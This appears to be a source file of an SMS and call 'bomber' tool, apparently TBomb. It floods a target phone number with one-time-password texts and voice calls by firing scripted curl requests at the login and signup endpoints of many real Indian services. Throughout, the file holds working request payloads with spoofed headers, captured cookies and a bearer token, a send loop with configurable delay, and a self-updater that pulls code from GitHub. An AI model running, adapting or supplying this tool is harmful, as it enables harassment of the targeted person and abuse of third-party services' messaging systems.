lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
os.system('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno=' + pn + '&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')
return True
elif lim == 4:
os.system(
'curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"' + pn + '","country_code":"' + cc + '"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')
return True
elif lim == 5:
os.system('curl -s -X POST -H "Accept:*/*" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.5" -H "Connection:keep-alive" -H "Content-Length:34" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:www.oriyamatrimony.com" -H "Referer:https://www.oriyamatrimony.com/" -H "User-Agent:Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0" -H "X-Requested-With:XMLHttpRequest" -d "countrycode=' +
cc + '&mobileno=' + pn + '" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')
return True
elif lim == 6:
os.system(
'curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+' + cc + pn + '"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')
return True
elif lim == 7:
os.system('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+' + cc + pn + '&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')
return True
elif lim == 8:
os.system('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile=' + pn + '&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')
return True
elif lim == 9:
rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
os.system(
'curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"' + pn + '","UserName":"' + pn + '","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')
return True
elif lim == 11:
os.system('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl=' + pn + '" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')
return True
elif lim == 12:
os.popen('rm temp.xxx1 > /dev/null 2>&1')
os.system(
'curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile=' + pn + '\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')
while not os.path.exists('temp.xxx1'):
time.sleep(0.1)
rd = str(open('temp.xxx1', 'rb').read()) + " "
return rd.find("sent") != -1
elif lim == 13:
rd = ' '
try:
rd = os.popen(
' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"' + pn + '","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read()
except Exception:
return True
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
con = '{"country_code":"' + cc + '","phone_number":"' + pn + '"}'
os.popen('rm temp.xxx2 > /dev/null 2>&1')
os.system('curl -s -X POST -H "Host:api.cloud.altbalaji.com" -H "Connection:keep-alive" -H "Content-Length:' + str(len(con)) +
'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \'' + con + '\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')
while not os.path.exists('temp.xxx2'):
time.sleep(0.1)
rd = hashlib.md5(open('temp.xxx2', 'rb').read()).hexdigest()
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
rd = os.popen('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email=' + cc + pn + '&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read().strip()
return rd.find('code:') != -1
elif lim == 16:
os.popen('curl -s -X POST -d \'method=SMS&countryCode=id&phoneNumber=' + cc + pn +
'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To ggspeedx29@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfully !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
# restart the input prompt if any character is not a digit
if not (cc + pn).isdigit():
    print('\n\nPhone Number Must Consist Of Numbers Only\n')
    continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
